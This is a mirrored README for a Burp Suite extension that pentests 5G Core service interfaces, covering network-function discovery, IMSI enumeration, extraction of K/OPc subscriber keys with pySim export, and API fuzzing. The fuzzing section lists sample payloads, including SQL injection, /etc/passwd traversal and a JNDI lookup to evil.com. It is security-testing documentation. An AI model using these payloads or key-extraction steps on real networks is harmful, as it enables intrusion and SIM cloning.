https://github.com/PentHertz/5GC_API_Pentest

5gc burpsuite fuzzing sbi telecom vulnerability-scanners

Last synced: 4 months ago
JSON representation

Host: GitHub
URL: https://github.com/PentHertz/5GC_API_Pentest
Owner: PentHertz
License: apache-2.0
Created: 2025-11-29T22:50:52.000Z (7 months ago)
Default Branch: main
Last Pushed: 2025-12-01T11:45:49.000Z (6 months ago)
Last Synced: 2026-02-03T07:21:05.510Z (4 months ago)
Topics: 5gc, burpsuite, fuzzing, sbi, telecom, vulnerability-scanners
Language: Python
Homepage: https://penthertz.com
Size: 99.6 KB
Stars: 13
Watchers: 1
Forks: 3
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-telco - 5GC_API_Pentest - 12]` - Burp Suite extension for 5G Core SBI security testing with automated NF discovery, IMSI enumeration, OAuth2 workflows, and OpenAPI fuzzing. Successor to 5GC_API_parse. From PentHertz. (Security / Security Exploitation/fuzzing Frameworks)

README

# 5GC API Penetration Testing Suite v1.0 - Community Edition

**Burp Suite Extension for 5G Core Network Security Testing**

---

## 📡 Overview

The **5GC API Penetration Testing Suite** is a comprehensive Burp Suite extension designed for security testing of 5G Core (5GC) networks. Developed by **Penthertz**, this tool automates the discovery, enumeration, and exploitation of vulnerabilities in 5G Service-Based Interfaces (SBI).

This tool is a replacement of **5GC API parser** Burp suite extension we have release a few years ago.

**Author:** Sébastien Dudek [@Penthertz](https://x.com/PentHertz)
**Company:** [Penthertz](https://penthertz.com) - RF Security & Telecommunications Security Experts
**License:** Apache License 2.0
**Version:** 1.0 Community Edition

### Quick demo

https://github.com/user-attachments/assets/8351c152-0234-4643-91ea-221a20eaabea

---

## ✨ Key Features

### 🎯 Automated Attack Scenarios
- **Auto-Audit**: A little one-click automatical assessment
- **Network Function Discovery**: Enumerate all 5GC network functions via NRF
- **IMSI Enumeration**: Discover active subscribers through UDM API
- **Credential Extraction**: Extract permanent authentication keys (K, OPc) from UDR
- **Vulnerability Detection**: Automated security issue identification

### 🔐 Authentication & Security
- **OAuth2 Support**: 3GPP TS 29.510 OAuth2 workflow (manual token acquisition)
- **mTLS Configuration**: Mutual TLS authentication support (beta)
- **JWT Bearer Tokens**: Automatic token injection into requests
- **Production Safety**: Rate limiting and request delay controls

### 🔍 Advanced Testing Capabilities
- **OpenAPI-based Fuzzing**: Load 3GPP YAML specs and fuzz endpoints
- **Template-based Fuzzing**: Use `$$markers$$` for precise payload injection
- **Request/Response Viewer**: Detailed HTTP traffic analysis
- **Burp Integration**: Send requests to Repeater, report to Scanner

### 📊 Rich User Interface
- **Dashboard**: Real-time statistics and quick actions
- **Configuration**: Complete 5GC network topology setup
- **Discovered Assets**: NF and IMSI tables with export
- **Credentials**: Secure credential management and export (JSON, CSV, pySim)
- **Security Issues**: Detailed vulnerability reports with request/response evidence
- **API Fuzzing**: Interactive fuzzing with payload categories
- **Activity Log**: Comprehensive logging with export

### 🌐 Network Function Support
- **Core NFs**: NRF, UDM, UDR, AUSF, AMF, SMF, PCF
- **Additional NFs**: BSF, NSSF, SMSF, NEF, SCP, SEPP, UPF, and more
- **API Versioning**: Auto-detection and configuration (v1, v2, v3)
- **SCP Proxy**: Automatic detection and use of Service Communication Proxy

---

## 🛠️ Requirements

### Software Requirements
- **Burp Suite Professional** (recommended) or Community Edition
- **Python/Jython 2.7** (included with Burp Suite)
- **Java 8+** (for Burp Suite)

### Target Environment
- **5G Core Network** (e.g., Open5GS, free5GC, commercial 5GC)
- Network access to 5GC SBI interfaces (typically HTTP on port 7777)
- Optional: OAuth2 server for authentication testing
- Optional: mTLS certificates for mutual authentication

### 3GPP Specifications (Optional)
- 3GPP Release 16/17/18 OpenAPI YAML files
- Available from: [jdegre/5GC_APIs](https://github.com/jdegre/5GC_APIs)

---

## 📥 Installation

### Step 1: Download the Extension

```bash
git clone https://github.com/PentHertz/5GC_API_pentest
cd 5GC_API_pentest
```

Note: Ensure you have Jython installed in Burp Suite.

### Step 2: Load in Burp Suite

1. Open **Burp Suite**
2. Navigate to **Extender** → **Extensions**
3. Click **Add**
4. Set **Extension Type** to **Python**
5. Select the `5GC_API_Pentest.py` file
6. Click **Next**

The extension should load successfully with output:
```
======================================================================
5GC API PENTEST SUITE v1.0 - Burp Extension (Community Edition)
Penthertz Security Research
======================================================================
[+] 5GC API Pentest Suite v1.0 (Community Edition) loaded successfully!
```

### Step 3: Access the Extension

A new tab **"5GC API Pentest"** will appear in Burp Suite.

---

## 🚀 Quick Start Guide

### 1. Configure Network Function URLs

Go to the **Configuration** tab:

```
NRF URL: http://127.0.0.10:7777 <--- At least this one
UDM URL: http://127.0.0.12:7777 (optional)
UDR URL: http://127.0.0.20:7777 (optional)
AUSF URL: http://127.0.0.11:7777 (optional)
AMF URL: http://127.0.0.5:7777 (optional)
SMF URL: http://127.0.0.4:7777 (optional)
```

**Tip:** The extension can auto-populate these after NF discovery.

### 2. Configure IMSI Range

```
Base IMSI: 999700000000
Start Range: 1
End Range: 100
Workers: 10
```

### 3. Run Auto-Audit

Go to the **Dashboard** tab and click:

**🔴 Auto-Audit**

This will automatically:
1. ✅ Discover all Network Functions
2. ✅ Enumerate valid IMSIs
3. ✅ Extract authentication credentials
4. ✅ Detect security vulnerabilities

### 4. Review Results

- **Discovered Assets**: View NFs and IMSIs
- **Credentials**: Extracted K/OPc keys
- **Security Issues**: Detailed vulnerability reports

---

## 🔐 OAuth2 Configuration (3GPP TS 29.510)

### Manual Token Workflow

The extension implements the **3GPP TS 29.510** OAuth2 specification with a **manual token acquisition workflow**.

#### Step 1: Configure OAuth2 Parameters

Go to **Configuration** → **OAuth2 / JWT Authentication**:

```
NRF OAuth2 URL: http://127.0.0.10:7777/oauth2/token
NF Instance ID: 12345678-1234-1234-1234-123456789abc
NF Type: AMF
Target NF Type: (optional)
Scope: nnrf-disc nnrf-nfm
```

#### Step 2: Generate OAuth2 Request

Click **"Generate OAuth2 Request"**

The extension will display:
```bash
# CURL COMMAND
curl -X POST 'http://127.0.0.10:7777/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d 'grant_type=client_credentials&nfInstanceId=...'
```

#### Step 3: Run Request Manually

**Option A:** Copy curl command and run in terminal
**Option B:** Click **"Send to Burp Repeater"** and execute

#### Step 4: Activate Token

1. Copy the `access_token` from the JSON response:
```json
{
"access_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...",
"token_type": "Bearer",
"expires_in": 3600
}
```

2. Paste the token into **"Access Token"** field
3. Click **"Activate Token"** (green button)

#### Step 5: Enable OAuth

Check: **☑ Enable OAuth2 Bearer Token for all requests**

All subsequent requests will include:
```
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
```

---

## 🎯 API Fuzzing

### Using 3GPP OpenAPI Specifications

#### Step 1: Load OpenAPI Directory

1. Download 3GPP specs:
```bash
git clone https://github.com/jdegre/5GC_APIs.git
```

2. Use `5GC_API_YAML_file_corrector_for_SnakeYAML.py` against this repository to fix unicode and other issues, unless it some YAML will not be correctly parsed

3. In Burp Suite, go to **API Fuzzing** tab, click **"Load API Directory..."**

3. Select the `5GC_APIs/` folder

The extension will parse all YAML files and display available APIs.

#### Step 2: Select API and Endpoint

1. **Select API**: Click on an API (e.g., "Nudm_SDM")
2. **Select Endpoint**: Choose an endpoint (e.g., `GET /nudm-sdm/v2/imsi-{imsi}/am-data`)

A **request template** will be generated with `$$markers$$`:

```http
GET /nudm-sdm/v2/imsi-$$imsi$$/am-data HTTP/1.1
Host: $$host$$
Content-Type: application/json
Accept: application/json
```

Change markers or other parameters with `$$param$$` marker to fuzz them.

#### Step 3: Configure Fuzzing

**Base URL:**
```
http://127.0.0.12:7777
```

**Threads:** 5
**Delay:** 100ms

#### Step 4: Load Payloads

**Option A:** Load from file (one payload per line)

**Option B:** Load by category:
- SQL Injection
- XSS (Cross-Site Scripting)
- Path Traversal
- 5GC Specific - IMSI

**Option C:** Manual entry:
```
' OR '1'='1
../../../etc/passwd
999700000000001
${jndi:ldap://evil.com/a}
```

#### Step 5: Start Fuzzing

Click **"Start Fuzzing"**

The extension will:
1. Replace each *$$marker$$* generally marked as `$$param$$` with payloads
2. Send requests and analyze responses
3. Detect anomalies (errors, injections, large responses)
4. Display results in real-time

#### Step 6: Review Results

- **Click row** to view full request/response
- **Right-click** → **"Send to Repeater"** for further testing
- **Export results** for reporting

---

## 📤 Export Capabilities

### Credentials Export

**JSON Format:**
```json
{
"timestamp": "2025-01-15 14:30:00",
"total_credentials": 50,
"credentials": [
{
"imsi": "999700000000001",
"k": "465B5CE8B199B49FAA5F0A2EE238A6BC",
"opc": "E8ED289DEBA952E4283B54E88E6183CA",
"sqn": "000000000001",
"amf": "8000"
}
]
}
```

**CSV Format:**
```csv
IMSI,K,OPc,SQN,AMF,Timestamp
999700000000001,465B5CE8...,E8ED289D...,000000000001,8000,2025-01-15 14:30:00
```

**pySim Format** (for SIM card programming):
```json
[
{
"IMSI": "999700000000001",
"Ki": "465B5CE8B199B49FAA5F0A2EE238A6BC",
"OPc": "E8ED289DEBA952E4283B54E88E6183CA",
"ADM1": "00000000",
"ICCID": "8988211000000000001"
}
]
```

### Security Report Export

Comprehensive JSON report including:
- Network Functions discovered
- IMSIs enumerated
- Credentials extracted
- Security issues with request/response evidence
- Configuration snapshot

---

## ⚙️ Advanced Configuration

### Production Safety Settings

Enable **PRODUCTION MODE** for safe testing:

```
☑ PRODUCTION MODE (enables safety features)

Max Requests/Second: 10
Request Delay (ms): 500
Max Concurrent Threads: 3
```

### Quick Presets

**🟢 Stealth Mode (Safe):**
- 3 workers, 5 req/s, 500ms delay
- IMSI range: 1-100
- Best for: Production testing

**🟡 Balanced Mode (Normal):**
- 10 workers, 20 req/s, 100ms delay
- IMSI range: 1-1000
- Best for: Lab testing

**🔴 Aggressive Mode (Fast):**
- 30 workers, 100 req/s, 10ms delay
- IMSI range: 1-10000
- **⚠️ Lab environments only!**

### API Version Configuration

Auto-detect, or manually configure:

```
NRF API Version: v1
UDM API Version: v2
UDR API Version: v2
AUSF API Version: v1
```

Click **"Auto-Detect Versions"** to automatically identify supported versions.

---

## 🔍 Common Use Cases

### Use Case 1: Unauthenticated NF Discovery

**Scenario:** Test if NRF allows unauthenticated network function enumeration

**Steps:**
1. Configure NRF URL
2. Dashboard → **"Discover NFs"**
3. Review **Discovered Assets** tab
4. Check **Security Issues** for "Missing Authentication" vulnerability

**Expected Finding:** High severity issue if authentication is not required

---

### Use Case 2: IMSI Privacy Violation

**Scenario:** Test if UDM allows IMSI enumeration without authentication

**Steps:**
1. Configure UDM URL and IMSI range
2. Dashboard → **"Enumerate IMSIs"**
3. Review discovered IMSIs
4. Check for "Privacy Violation" security issue

**Expected Finding:** High severity if sequential IMSI testing succeeds

---

### Use Case 3: Credential Exposure

**Scenario:** Test if UDR exposes permanent authentication keys

**Steps:**
1. Run IMSI enumeration first
2. Dashboard → **"Extract Credentials"**
3. Review **Credentials** tab for K/OPc values
4. Export credentials for offline analysis

**Expected Finding:** Critical vulnerability if K/OPc are accessible without authentication

---

### Use Case 4: OAuth2 Implementation Testing

**Scenario:** Test OAuth2 token workflow and validation

**Steps:**
1. Configure OAuth2 parameters
2. Generate and execute token request
3. Activate token
4. Run attacks with OAuth enabled
5. Compare results with/without authentication

**Expected Finding:** Proper authentication should block unauthorized access

---

### Use Case 5: API Fuzzing for Injection

**Scenario:** Test for SQL/NoSQL injection vulnerabilities

**Steps:**
1. Load 3GPP OpenAPI specs
2. Select UDR authentication endpoint
3. Load "SQL Injection" payload category
4. Start fuzzing
5. Review anomalies (500 errors, error disclosure)

**Expected Finding:** Properly sanitized inputs should not produce errors

---

## Additional Resources

- [Open5GS Documentation](https://open5gs.org/open5gs/docs/)
- [free5GC Documentation](https://free5gc.org/)
- [3GPP Specifications](https://www.3gpp.org/specifications)
- [Penthertz Blog](https://penthertz.com/blog)

---

## 📄 License

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
```

---

## 🌟 Acknowledgments

- **Open5GS** team for open-source 5G Core implementation
- **PortSwigger** for Burp Suite framework
- **jdegre** for maintaining 5GC_APIs repository
- The **5G security research community**

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/PentHertz/5GC_API_Pentest

Awesome Lists containing this project

README